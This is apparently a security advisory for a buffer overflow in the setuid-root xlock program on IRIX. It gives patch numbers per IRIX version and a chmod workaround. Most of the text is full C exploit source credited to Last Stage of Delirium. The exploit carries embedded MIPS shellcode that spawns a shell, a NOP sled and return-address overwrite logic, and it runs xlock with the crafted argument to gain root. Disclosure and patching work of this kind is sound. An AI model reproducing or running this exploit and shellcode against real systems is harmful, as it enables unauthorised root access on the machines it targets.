COMMAND
/usr/bin/X11/xlock
SYSTEMS AFFECTED
IRIX
PROBLEM
The xlock(1) program is used to lock the local X display of a
system until a correct password is entered at the keyboard. The
program is setuid root and as part of the process of locking an X
display accepts user arguments to establish specific xlock
operation.
It has been determined that an appropriately crafted set of
arguments could be input to the xlock program allowing execution
of arbitrary user commands with root privileges. This resulting
buffer overflow condition is considered a security vulnerability
in the xlock program. This vulnerability can be utilized to
execute commands with root privileges.
Below is exploit code for buffer overflow. Originally it was
written by Polish group LsD. Exploit follows:
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define BUFSIZE 2072
#define OFFS (800+512+128)
#define ADDRS 0x100
#define ALIGN 2
char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
char nop[]="\x24\x0f\x12\x34";
void run(unsigned char *buf) {
execl("/usr/bin/X11/xlock","lsd","-name",buf,NULL);
printf("execl failed\n");
}
char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34";
main(int argc, char *argv[]) {
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
int i, noplen=strlen(nop);
if (argc >1) bufsize=atoi(argv[1]);
if (argc >2) offs=atoi(argv[2]);
if (argc >3) addrs=atoi(argv[3]);
if (argc >4) align=atoi(argv[4]);
if (bufsize<strlen(asmcode)) {
printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
exit(1);
}
if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) {
printf("Can't malloc\n");
exit(1);
}
*(int *)addr=(*(unsigned long(*)())jump)()+offs;
printf("address=%p\n",*(int *)addr);
strcpy(buf,nop);
ptr=buf+noplen;
buf+=4-align;
for(i=0;i<bufsize;i++)
*ptr++=nop[i%noplen];
memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode));
for(i=0;i<(addrs<<2);i++)
*ptr++=addr[i%sizeof(int)];
*ptr=0;
printf("buflen=%d\n",strlen(buf));
fflush(stdout);
/* gp value is set here */
ptr=buf+ALIGN+(0x7fff22c0-0x7fff1ea0);
*(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff3828-0x7fff3468)+32476;
for(i=0;i<4;i++)
*ptr++=addr[i&3];
run(buf);
}
SOLUTION
Although patches are available for this issue, it is realized that
there may be situations where installing the patches immediately
may not be possible. You can change permissions on xlock
program to remove the vulnerability.
# /bin/chmod 500 /usr/bin/X11/xlock
Patches are:
OS Version Vulnerable? Patch # Other Actions
---------- ----------- ------- -------------
IRIX 3.x no
IRIX 4.x no
IRIX 5.0.x yes not avail Note 1
IRIX 5.1.x yes not avail Note 1
IRIX 5.2 yes not avail Note 1
IRIX 5.3 yes 2090
IRIX 6.0.x yes not avail Note 1
IRIX 6.1 yes not avail Note 1
IRIX 6.2 yes 2090
IRIX 6.3 yes 2090
IRIX 6.4 yes 2091
Note 1 means to upgrade operating system or change permissions.